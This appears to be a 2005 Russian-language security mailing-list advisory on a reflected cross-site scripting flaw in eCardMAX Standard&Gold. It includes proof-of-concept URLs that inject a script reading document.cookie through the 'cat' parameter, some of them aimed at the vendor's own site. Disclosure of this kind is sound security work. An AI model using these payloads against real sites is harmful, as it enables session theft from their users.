Related information

Web applications security vulnerabilities (PHP, ASP, JSP, CGI, Perl)

MyBB 1.0 SQL injection in uploading file

MyBB XSS cross-site scripting

BugPort Multiple vuln.

PHPDocumentor Cross-Site Scripting

From:	durito <durito_(at)_mail.ru>
Date:	30.12.2005
Subject:	Re[2]: новые уязвимости

Здравствуйте, 3APA3A.

свежая порция:
Software:  eCardMAX Standard&Gold
 Vendor:  eCardMAX www.ecardmax.com
 Vulnerability: межсайтовый скриптинг
 Risk:  низкий
 Date:  30.12.2005
 discovered by durito -durito[at]mail[dot]ru-
 HTTP:         all-about-all.net
               durito.narod.ru

 +~~~:| Details |:
 

 Межсайтовый скриптинг:
http://www.xxx.com/index.php?cat=%3Cscript%3Ealert(document.
cookie)%3C/script%3E&lang=

 Примеры:

http://www.ecardmax.com/gold/index.php?cat=%3Ch1%3EHello%3C/h1%3E
&lang=
http://www.ecardmax.com/greetings/index.php?cat=%3Cscript%3Ealert(doc
ument.cookie)%3C/script%3E&lang=
 
--
С уважением,
durito  [LwB Security Team]                mailto:durito@mail.ru
http://durito.narod.ru